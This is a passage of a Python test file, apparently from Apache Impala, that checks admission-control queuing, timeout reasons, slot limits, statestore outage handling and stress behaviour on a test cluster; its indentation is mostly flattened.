"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB host memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to host memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough memory available on host.*"""\
"""Stats for host.*"""\
"""topN_query_stats.*"""\
"""all_query_stats:.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
pool_max_mem=2 * 1024 * 1024, proc_mem_limit=20 * 1024 * 1024,
queue_wait_timeout_ms=1000),
statestored_args=_STATESTORED_ARGS)
def test_timeout_reason_pool_memory(self):
"""Test that queue details appear in the profile when queued and then timed out
due to a small 2MB pool memory limit configuration."""
# Run a bunch of queries with mem_limit set so that only one can be admitted
# immediately. The rest should be queued and dequeued (timeout) due to pool memory
# pressure.
STMT = "select sleep(100)"
TIMEOUT_S = 20
NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S, {'mem_limit': '2mb'}, True)
EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
"""default-pool.*"""\
"""Not enough aggregate memory available in pool default-pool.*"""\
"""Aggregated stats for pool.*"""\
"""topN_query_stats.*"""
num_reasons = len([profile for profile in profiles
if re.search(EXPECTED_REASON, profile, re.DOTALL)])
assert num_reasons >= 1, \
"At least one query should have been timed out with topN query details: " +\
'\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
pool_max_mem=-1, admission_control_slots=4,
executor_groups="default-pool-group1"),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_slots(self):
"""Test that queue details appear in the profile when queued based on number of
slots."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
"slots available on host"
NUM_QUERIES = 5
coordinator_limited_metric = \
"admission-controller.total-dequeue-failed-coordinator-limited"
original_metric_value = self.get_metric(coordinator_limited_metric)
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S, config_options={"mt_dop": 4})
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
over_limit_details = [detail
for detail in init_queue_reasons
if "Not enough admission control slots available on host" in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of slots: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
# Confirm that the cluster quiesces and all metrics return to zero.
for impalad in self.cluster.impalads:
verifier = MetricVerifier(impalad.service)
verifier.wait_for_backend_admission_control_state()
# The number of admission control slots on the coordinator is limited
# so the failures to dequeue should trigger a bump in the coordinator_limited_metric.
later_metric_value = self.get_metric(coordinator_limited_metric)
assert later_metric_value > original_metric_value, \
"Metric %s did not change" % coordinator_limited_metric
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_query_locations_correctness(self, vector):
"""Regression test for IMPALA-7516: Test to make sure query locations and in-flight
queries are correct for different admission results that can affect it."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
# Case 1: When a query runs succesfully.
handle = self.client.execute_async(query)
self.__assert_num_queries_accounted(1)
self.close_query(handle)
self.__assert_num_queries_accounted(0)
# Case 2: When a query is queued then cancelled
handle_running = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_running)
handle_queued = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_queued)
self.impalad_test_service.wait_for_metric_value(
"admission-controller.total-queued.default-pool", 1)
# Queued queries don't show up on backends
self.__assert_num_queries_accounted(1, 1)
# First close the queued query
self.close_query(handle_queued)
self.close_query(handle_running)
self.__assert_num_queries_accounted(0)
# Case 3: When a query gets rejected
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "1b"
self.execute_query_expect_failure(self.client, query, exec_options)
self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
"""Checks if the num of queries accounted by query_locations and in-flight are as
expected"""
# Wait for queries to start/un-register.
num_inflight = num_running + num_queued
assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
query_locations = self.impalad_test_service.get_query_locations()
for host, num_q in query_locations.items():
      assert num_q == num_running, "There should be {0} running queries on each " \
          "impalad: {1}".format(num_running, query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
"""Runs functional tests for the max/min_query_mem_limit pool config attributes"""
exec_options = vector.get_value('exec_option')
# Set this to the default.
exec_options['exec_single_node_rows_threshold'] = 100
    # Set num_nodes to 1 since it's easier to see the one-to-one mapping of per_host and
# per_cluster values used in the test.
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml",
additional_args="-default_pool_max_requests 1", make_copy=True),
statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
"""Tests that the invalid checks work even if the query is queued. Makes sure that a
queued query is dequeued and rejected if the config is invalid."""
pool_name = "invalidTestPool"
config_str = "max-query-mem-limit"
self.client.set_configuration_option('request_pool', pool_name)
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
self.__wait_for_change_to_profile(sleep_query_handle,
"Admission result: Admitted immediately")
queued_query_handle = self.client.execute_async("select 2")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
# Change config to be invalid.
llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path)
config.set_config_value(pool_name, config_str, 1)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
    self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20)
self.close_query(queued_query_handle)
# Change the config back to a valid value
config.set_config_value(pool_name, config_str, 0)
# Now do the same thing for change to pool.max-query-mem-limit such that it can no
# longer accommodate the largest min_reservation.
# Setup to queue a query.
sleep_query_handle = self.client.execute_async("select sleep(10000)")
self.client.wait_for_admission_control(sleep_query_handle)
queued_query_handle = self.client.execute_async(
"select * from functional_parquet.alltypes limit 1")
self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
    # Change the config to something less than what is required to accommodate the
    # largest min_reservation (which in this case is 32.09 MB).
config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
# Close running query so the queued one gets a chance.
self.client.close_query(sleep_query_handle)
# Observe that the queued query fails.
    self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20)
self.close_query(queued_query_handle)
def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20):
for _ in range(timeout * 10):
profile = self.client.get_runtime_profile(query_handle)
if search_string in profile:
return
sleep(0.1)
assert False, "Timed out waiting for change to profile\nSearch " \
"String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
"""Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
the query's queuing status, that is, whether the query was queued and what was the
latest queuing reason."""
# Start a long running query.
long_query_resp = self.execute_statement("select sleep(10000)")
# Ensure that the query has started executing.
self.wait_for_admission_control(long_query_resp.operationHandle)
# Submit another query.
queued_query_resp = self.execute_statement("select 1")
# Wait until the query is queued.
self.wait_for_operation_state(queued_query_resp.operationHandle,
TCLIService.TOperationState.PENDING_STATE)
# Check whether the query log message correctly exposes the queuing status.
get_log_req = TCLIService.TGetLogReq()
get_log_req.operationHandle = queued_query_resp.operationHandle
log = self.hs2_client.GetLog(get_log_req).log
assert "Admission result : Queued" in log, log
assert "Latest admission queue reason : number of running queries 1 is at or over "
"limit 1" in log, log
# Now check the same for ExecSummary.
summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
summary_req.operationHandle = queued_query_resp.operationHandle
summary_req.sessionHandle = self.session_handle
exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
assert exec_summary_resp.summary.is_queued
assert "number of running queries 1 is at or over limit 1" in \
exec_summary_resp.summary.queued_reason,\
exec_summary_resp.summary.queued_reason
# Close the running query.
self.close(long_query_resp.operationHandle)
# Close the queued query.
self.close(queued_query_resp.operationHandle)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=3,
pool_max_mem=1024 * 1024 * 1024) +
" --admission_control_stale_topic_threshold_ms={0}".format(
STALE_TOPIC_THRESHOLD_MS),
statestored_args=_STATESTORED_ARGS)
def test_statestore_outage(self):
"""Test behaviour with a failed statestore. Queries should continue to be admitted
but we should generate diagnostics about the stale topic."""
self.cluster.statestored.kill()
impalad = self.cluster.impalads[0]
# Sleep until the update should be definitely stale.
sleep(STALE_TOPIC_THRESHOLD_MS / 1000. * 1.5)
ac_json = impalad.service.get_debug_webpage_json('/admission')
ms_since_update = ac_json["statestore_admission_control_time_since_last_update_ms"]
assert ms_since_update > STALE_TOPIC_THRESHOLD_MS
assert ("Warning: admission control information from statestore is stale:" in
ac_json["statestore_update_staleness_detail"])
# Submit a batch of queries. One should get to run, one will be rejected because
# of the full queue, and the others will run after being queued.
STMT = "select sleep(100)"
TIMEOUT_S = 60
NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in range(NUM_QUERIES)],
TIMEOUT_S, allow_query_failure=True)
ADMITTED_STALENESS_WARNING = \
"Warning: admission control information from statestore is stale"
ADMITTED_STALENESS_PROFILE_ENTRY = \
"Admission control state staleness: " + ADMITTED_STALENESS_WARNING
num_queued = 0
num_admitted_immediately = 0
num_rejected = 0
for profile in profiles:
if "Admission result: Admitted immediately" in profile:
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
num_admitted_immediately += 1
elif "Admission result: Rejected" in profile:
num_rejected += 1
# Check that the rejection error returned to the client contains a warning.
query_statuses = [line for line in profile.split("\n")
if "Query Status:" in line]
assert len(query_statuses) == 1, profile
assert ADMITTED_STALENESS_WARNING in query_statuses[0]
else:
assert "Admission result: Admitted (queued)" in profile, profile
assert ADMITTED_STALENESS_PROFILE_ENTRY in profile, profile
# Check that the queued reason contains a warning.
queued_reasons = [line for line in profile.split("\n")
if "Initial admission queue reason:" in line]
assert len(queued_reasons) == 1, profile
assert ADMITTED_STALENESS_WARNING in queued_reasons[0]
num_queued += 1
assert num_admitted_immediately == 1
assert num_queued == 3
assert num_rejected == NUM_QUERIES - num_admitted_immediately - num_queued
@pytest.mark.execute_serially
def test_impala_server_startup_delay(self):
"""This test verifies that queries get queued when the coordinator has already started
accepting client connections during startup, but the local backend descriptor is not
yet available."""
server_start_delay_s = 20
# We need to start the cluster here instead of during setup_method() so we can launch
# it from a separate thread.
def start_cluster():
LOG.info("Starting cluster")
impalad_args = "--debug_actions=IMPALA_SERVER_END_OF_START:SLEEP@%s" % (
1000 * server_start_delay_s)
self._start_impala_cluster(['--impalad_args=%s' % impalad_args])
# Initiate the cluster start
start_cluster_thread = threading.Thread(target=start_cluster)
start_cluster_thread.start()
# Wait some time to arrive at IMPALA_SERVER_END_OF_START
sleep(server_start_delay_s)
# With a new client, execute a query and observe that it gets queued and ultimately
# succeeds.
client = self.create_impala_client()
result = self.execute_query_expect_success(client, "select 1")
start_cluster_thread.join()
profile = result.runtime_profile
reasons = self.__extract_init_queue_reasons([profile])
assert len(reasons) == 1
assert "Coordinator not registered with the statestore." in reasons[0]
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_release_backends(self, vector):
"""Test that executor backends are shutdown when they complete, that completed
executor backends release their admitted memory, and that
NumCompletedBackends is updated each time an executor backend completes."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Craft a query where part of the executor backends completes, while the rest remain
# running indefinitely. The query forces the 'lineitem' table to be treated as the
# small table even though it is bigger than the 'customer' table. This forces the
# small table scan ('lineitem' scan) to run on two nodes and the big table scan
# ('customers' scan) to run on a single node. By using debug actions to force the
# big table scan to hang indefinitely, the small table scan should finish quickly.
# This causes one executor backend to complete quickly, and causes the other one to
# hang.
vector.get_value('exec_option')['debug_action'] = '0:GETNEXT:WAIT'
query = "select STRAIGHT_JOIN * from tpch.customer JOIN /* +BROADCAST */ " \
"tpch.lineitem where customer.c_custkey = lineitem.l_orderkey limit 100"
# Amount of time to wait for the query to reach the running state before throwing a
# Timeout exception.
timeout = 10
handle = self.execute_query_async(query, vector.get_value('exec_option'))
try:
# Wait for the query to reach the running state (it should never reach the finished
# state because of the 'WAIT' debug action), wait for the 'lineitem' scan to
# complete, and then validate that one of the executor backends shutdowns and
# releases its admitted memory.
self.wait_for_state(handle, self.client.QUERY_STATES['RUNNING'], timeout)
# Once the 'lineitem' scan completes, NumCompletedBackends should be 1.
self.assert_eventually(60, 1, lambda: "NumCompletedBackends: 1 (1)"
in self.client.get_runtime_profile(handle))
      assert get_num_completed_backends(self.cluster.impalads[0].service,
          handle.get_handle().id) == 1
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
num_executor_zero_admitted = 0
for executor_mem_admitted in mem_admitted['executor']:
if executor_mem_admitted == 0:
num_executor_zero_admitted += 1
assert num_executor_zero_admitted == 1
finally:
# Once the query is closed, validate that all backends have shutdown.
self.client.close_query(handle)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
assert mem_admitted['coordinator'] == 0
for executor_mem_admitted in mem_admitted['executor']:
assert executor_mem_admitted == 0
class TestAdmissionControllerStress(TestAdmissionControllerBase):
"""Submits a number of queries (parameterized) with some delay between submissions
(parameterized) and the ability to submit to one impalad or many in a round-robin
fashion. Each query is submitted on a separate thread. After admission, the query
thread will block with the query open and wait for the main thread to notify it to
end its query. The query thread can end its query by fetching to the end, cancelling
itself, closing itself, or waiting for the query timeout to take effect. Depending
on the test parameters a varying number of queries will be admitted, queued, and
rejected. After the queries are admitted, the main thread will request each admitted
query thread to end its query and allow queued queries to be admitted.
The test tracks the state of the admission controller using the metrics from each
impalad to do the following:
(1) After submitting all queries, the change in metrics for the number of admitted,
queued, and rejected requests should sum to the number of queries and that the
values are reasonable given the test parameters.
(2) While there are running queries:
* Request the currently running queries to end and wait for the queries to end.
Verify the metric for the number of completed queries. The threads that
submitted those queries will keep their connections open until the entire test
completes. This verifies that admission control is tied to the end of the query
and does not depend on closing the connection.
* Check that queued requests are then dequeued and verify using the metric for the
number of dequeued requests. The threads that were waiting to submit the query
should then insert themselves into a list of currently running queries and then
wait for a notification from the main thread.
(3) After all queries have completed, check that the final number of admitted,
queued, and rejected requests are reasonable given the test parameters. When
submitting to a single impalad, we know exactly what the values should be,
otherwise we just check that they are within reasonable bounds.
"""
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerStress, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('num_queries', *NUM_QUERIES))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('round_robin_submission', *ROUND_ROBIN_SUBMISSION))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('submission_delay_ms', *SUBMISSION_DELAY_MS))
# Additional constraints for code coverage jobs and core.
num_queries = None
if ImpalaTestClusterProperties.get_instance().has_code_coverage():
# Code coverage builds can't handle the increased concurrency.
num_queries = 15
elif cls.exploration_strategy() == 'core':
num_queries = 30
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('submission_delay_ms') == 0)
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('round_robin_submission'))
if num_queries is not None:
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('num_queries') == num_queries)
def setup(self):
# All threads are stored in this list and it's used just to make sure we clean up
# properly in teardown.
self.all_threads = list()
# Each submission thread will append() itself to this list if the query begins
# execution. The main thread will access this list to determine which threads are
# executing queries that can be cancelled (it will pop() elements from the front of
# the list). The individual operations on the list are atomic and thread-safe thanks
# to the GIL.
self.executing_threads = list()
def teardown(self):
# Set shutdown for all threads (cancel if needed)
for thread in self.all_threads:
try:
thread.lock.acquire()
thread.shutdown = True
if thread.query_handle is not None:
LOG.debug("Attempt to clean up thread executing query %s (state %s)",
thread.query_num, thread.query_state)
client = thread.impalad.service.create_beeswax_client()
try:
client.cancel(thread.query_handle)
finally:
client.close()
finally:
thread.lock.release()
# Wait for all threads to exit
for thread in self.all_threads:
thread.join(5)
LOG.debug("Join thread for query num %s %s", thread.query_num,
"TIMED OUT" if thread.isAlive() else "")
def get_admission_metrics(self):
"""
Returns a map of the admission metrics, aggregated across all of the impalads.
The metrics names are shortened for brevity: 'admitted', 'queued', 'dequeued',
'rejected', 'released', and 'timed-out'.
"""
metrics = {'admitted': 0, 'queued': 0, 'dequeued': 0, 'rejected': 0,
'released': 0, 'timed-out': 0}
for impalad in self.impalads:
keys = [metric_key(self.pool_name, 'total-%s' % short_name)
for short_name in metrics.keys()]
values = impalad.service.get_metric_values(keys, [0] * len(keys))
for short_name, value in zip(metrics.keys(), values):
metrics[short_name] += value
return metrics
def get_consistent_admission_metrics(self, num_submitted):
"""Same as get_admission_metrics() except retries until it gets consistent metrics for
num_submitted queries. See IMPALA-6227 for an example of problems with inconsistent
metrics where a dequeued query is reflected in dequeued but not admitted."""
ATTEMPTS = 5
for i in xrange(ATTEMPTS):
metrics = self.get_admission_metrics()
admitted_immediately = num_submitted - metrics['queued'] - metrics['rejected']
if admitted_immediately + metrics['dequeued'] == metrics['admitted']:
return metrics
LOG.info("Got inconsistent metrics {0}".format(metrics))
assert False, "Could not get consistent metrics for {0} queries after {1} attempts: "\
"{2}".format(num_submitted, ATTEMPTS, metrics)
def wait_for_metric_changes(self, metric_names, initial, expected_delta):
"""
Waits for the sum of metrics in metric_names to change by at least expected_delta.
This is similar to ImpalaService.wait_for_metric_value(), but it uses one or more
metrics aggregated across all impalads, e.g. we want to wait for the total number of
admitted, queued, and rejected metrics to change some amount in total, but we don't
know exactly how the metrics will change individually.
'metric_names' is a list of the keys returned by get_admission_metrics() which are
expected to change.
'initial' is the initial set of metrics returned by get_admission_metrics() to
compare against.
'expected_delta' is the total change expected across all impalads for the specified
metrics.
"""
log_metrics("wait_for_metric_changes, initial=", initial)
current = initial
start_time = time()
while True:
current = self.get_admission_metrics()
log_metrics("wait_for_metric_changes, current=", current)
deltas = compute_metric_deltas(current, initial)
delta_sum = sum([deltas[x] for x in metric_names])
LOG.info("DeltaSum=%s Deltas=%s (Expected=%s for metrics=%s)",
delta_sum, deltas, expected_delta, metric_names)
if delta_sum >= expected_delta:
LOG.info("Found all %s metrics after %s seconds", delta_sum,
round(time() - start_time, 1))
return (deltas, current)
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting {0} seconds for metrics {1} delta {2} "\
"current {3} initial {4}" .format(
STRESS_TIMEOUT, ','.join(metric_names), expected_delta, str(current),
str(initial))
sleep(1)
def wait_for_statestore_updates(self, heartbeats):
"""Waits for a number of admission control statestore updates from all impalads."""
start_time = time()
init = dict()
curr = dict()
for impalad in self.impalads:
init[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
curr[impalad] = init[impalad]
while True:
LOG.debug("wait_for_statestore_updates: curr=%s, init=%s, d=%s", curr.values(),
init.values(), [curr[i] - init[i] for i in self.impalads])
if all([curr[i] - init[i] >= heartbeats for i in self.impalads]): break
for impalad in self.impalads:
curr[impalad] = impalad.service.get_metric_value(
REQUEST_QUEUE_UPDATE_INTERVAL)['count']
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for heartbeats" % (STRESS_TIMEOUT,)
sleep(STATESTORE_RPC_FREQUENCY_MS / float(1000))
LOG.info("Waited %s for %s heartbeats", round(time() - start_time, 1), heartbeats)
def wait_for_admitted_threads(self, num_threads):
"""
Wait for query submission threads to update after being admitted, as determined
by observing metric changes. This is necessary because the metrics may change
before the execute_async() calls on the query threads return and add themselves
to self.executing_threads.
"""
start_time = time()
LOG.info("Waiting for %s threads to begin execution", num_threads)
# All individual list operations are thread-safe, so we don't need to use a
# lock to synchronize before checking the list length (on which another thread
# may call append() concurrently).
while len(self.executing_threads) < num_threads:
assert (time() - start_time < STRESS_TIMEOUT), ("Timed out waiting %s seconds for "
"%s admitted client rpcs to return. Only %s executing " % (
STRESS_TIMEOUT, num_threads, len(self.executing_threads)))
sleep(0.1)
LOG.info("Found all %s admitted threads after %s seconds", num_threads,
round(time() - start_time, 1))
def end_admitted_queries(self, num_queries):
"""
Requests each admitted query to end its query.
"""
assert len(self.executing_threads) >= num_queries
LOG.info("Requesting {0} clients to end queries".format(num_queries))
# Request admitted clients to end their queries
current_executing_queries = []
for i in xrange(num_queries):
# pop() is thread-safe, it's OK if another thread is appending concurrently.
thread = self.executing_threads.pop(0)
LOG.info("Cancelling query %s", thread.query_num)
assert thread.query_state == 'ADMITTED'
current_executing_queries.append(thread)
thread.query_state = 'REQUEST_QUERY_END'
# Wait for the queries to end
start_time = time()
while True:
all_done = True
for thread in self.all_threads:
if thread.query_state == 'REQUEST_QUERY_END':
all_done = False
if all_done:
break
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query end" % (STRESS_TIMEOUT,)
sleep(1)
class SubmitQueryThread(threading.Thread):
def __init__(self, impalad, additional_query_options, vector, query_num,
query_end_behavior, executing_threads):
"""
executing_threads must be provided so that this thread can add itself when the
query is admitted and begins execution.
"""
super(self.__class__, self).__init__()
self.executing_threads = executing_threads
self.vector = vector
self.additional_query_options = additional_query_options
self.query_num = query_num
self.query_end_behavior = query_end_behavior
self.impalad = impalad
self.error = None
# query_state is defined and used only by the test code, not a property exposed by
# the server
self.query_state = 'NOT_SUBMITTED'
# lock protects query_handle and shutdown, used by the main thread in teardown()
self.lock = threading.RLock()
self.query_handle = None
self.shutdown = False # Set by the main thread when tearing down
def run(self):
client = None
try:
try:
# Take the lock while query_handle is being created to avoid an unlikely race
# condition with teardown() (i.e. if an error occurs on the main thread), and
# check if the test is already shut down.
self.lock.acquire()
if self.shutdown:
return
exec_options = self.vector.get_value('exec_option')
exec_options.update(self.additional_query_options)
query = QUERY.format(self.query_num)
self.query_state = 'SUBMITTING'
client = self.impalad.service.create_beeswax_client()
ImpalaTestSuite.change_database(client, self.vector.get_value('table_format'))
client.set_configuration(exec_options)
if self.query_end_behavior == 'QUERY_TIMEOUT':
client.execute("SET QUERY_TIMEOUT_S={0}".format(QUERY_END_TIMEOUT_S))
LOG.info("Submitting query %s", self.query_num)
self.query_handle = client.execute_async(query)
client.wait_for_admission_control(self.query_handle)
admission_result = client.get_admission_result(self.query_handle)
assert len(admission_result) > 0
if "Rejected" in admission_result:
LOG.info("Rejected query %s", self.query_num)
self.query_state = 'REJECTED'
self.query_handle = None
return
elif "Timed out" in admission_result:
LOG.info("Query %s timed out", self.query_num)
self.query_state = 'TIMED OUT'
self.query_handle = None
return
LOG.info("Admission result for query %s : %s", self.query_num, admission_result)
except ImpalaBeeswaxException as e:
LOG.exception(e)
raise e
finally:
self.lock.release()
LOG.info("Admitted query %s", self.query_num)
self.query_state = 'ADMITTED'
# The thread becomes visible to the main thread when it is added to the
# shared list of executing_threads. append() is atomic and thread-safe.
self.executing_threads.append(self)
# Synchronize with the main thread. At this point, the thread is executing a
# query. It needs to wait until the main thread requests it to end its query.
while not self.shutdown:
# The QUERY_TIMEOUT needs to stay active until the main thread requests it
# to end. Otherwise, the query may get cancelled early. Fetch rows 2 times
# per QUERY_TIMEOUT interval to keep the query active.
if self.query_end_behavior == 'QUERY_TIMEOUT' and \
self.query_state != 'COMPLETED':
fetch_result = client.fetch(query, self.query_handle, 1)
assert len(fetch_result.data) == 1, str(fetch_result)
if self.query_state == 'REQUEST_QUERY_END':
self._end_query(client, query)
# The query has released admission control resources
self.query_state = 'COMPLETED'
self.query_handle = None
sleep(QUERY_END_TIMEOUT_S / 6)
except Exception as e:
LOG.exception(e)
# Unknown errors will be raised later
self.error = e
self.query_state = 'ERROR'
finally:
LOG.info("Thread terminating in state=%s", self.query_state)
if client is not None:
client.close()
def _end_query(self, client, query):
"""Bring the query to the appropriate end state defined by self.query_end_behaviour.
Returns once the query has reached that state."""
LOG.info("Ending query %s by %s",
str(self.query_handle.get_handle()), self.query_end_behavior)
if self.query_end_behavior == 'QUERY_TIMEOUT':
# Sleep and wait for the query to be cancelled. The cancellation will
# set the state to EXCEPTION.
start_time = time()
while (client.get_state(self.query_handle) !=
client.QUERY_STATES['EXCEPTION']):
assert (time() - start_time < STRESS_TIMEOUT),\
"Timed out waiting %s seconds for query cancel" % (STRESS_TIMEOUT,)
sleep(1)
elif self.query_end_behavior == 'EOS':
# Fetch all rows so we hit eos.
client.fetch(query, self.query_handle)
elif self.query_end_behavior == 'CLIENT_CANCEL':
client.cancel(self.query_handle)
else:
assert self.query_end_behavior == 'CLIENT_CLOSE'
client.close_query(self.query_handle)
def _check_queries_page_resource_pools(self):
"""Checks that all queries in the '/queries' webpage json have the correct resource
pool (this is called after all queries have been admitted, queued, or rejected, so
they should already have the pool set), or no pool for queries that don't go through
admission control."""
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in itertools.chain(queries_json['in_flight_queries'],
queries_json['completed_queries']):
if query['stmt_type'] == 'QUERY' or query['stmt_type'] == 'DML':
assert query['last_event'] != 'Registered' and \
query['last_event'] != 'Planning finished'
assert query['resource_pool'] == self.pool_name
else:
assert query['resource_pool'] == ''
def _get_queries_page_num_queued(self):
"""Returns the number of queries currently in the 'queued' state from the '/queries'
webpage json"""
num_queued = 0
for impalad in self.impalads:
queries_json = impalad.service.get_debug_webpage_json('/queries')
for query in queries_json['in_flight_queries']:
if query['last_event'] == 'Queued':
num_queued += 1
return num_queued
def run_admission_test(self, vector, additional_query_options):
LOG.info("Starting test case with parameters: %s", vector)
self.impalads = self.cluster.impalads
round_robin_submission = vector.get_value('round_robin_submission')
submission_delay_ms = vector.get_value('submission_delay_ms')
if not round_robin_submission:
self.impalads = [self.impalads[0]]
num_queries = vector.get_value('num_queries')
assert num_queries >= MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
initial_metrics = self.get_admission_metrics()
log_metrics("Initial metrics: ", initial_metrics)
for query_num in xrange(num_queries):
impalad = self.impalads[query_num % len(self.impalads)]
query_end_behavior = QUERY_END_BEHAVIORS[query_num % len(QUERY_END_BEHAVIORS)]
thread = self.SubmitQueryThread(impalad, additional_query_options, vector,
query_num, query_end_behavior, self.executing_threads)
thread.start()
self.all_threads.append(thread)
sleep(submission_delay_ms / 1000.0)
# Wait for the admission control to make the initial admission decision for all of
# the queries. They should either be admitted immediately, queued, or rejected.
    # The test query is chosen so that it will remain active on all backends until the test
# ends the query. This prevents queued queries from being dequeued in the background
# without this thread explicitly ending them, so that the test can admit queries in
# discrete waves.
LOG.info("Wait for initial admission decisions")
(metric_deltas, curr_metrics) = self.wait_for_metric_changes(
['admitted', 'queued', 'rejected'], initial_metrics, num_queries)
# Also wait for the test threads that submitted the queries to start executing.
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Check that the admission decisions are reasonable given the test parameters
# The number of admitted and queued requests should be at least the configured limits
# but less than or equal to those limits times the number of impalads.
assert metric_deltas['dequeued'] == 0,\
"Queued queries should not run until others are made to finish"
assert metric_deltas['admitted'] >= MAX_NUM_CONCURRENT_QUERIES,\
"Admitted fewer than expected queries"
assert metric_deltas['admitted'] <= MAX_NUM_CONCURRENT_QUERIES * len(self.impalads),\
"Admitted more than expected queries: at least one daemon over-admitted"
assert metric_deltas['queued'] >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES),\
"Should have queued more queries before rejecting them"
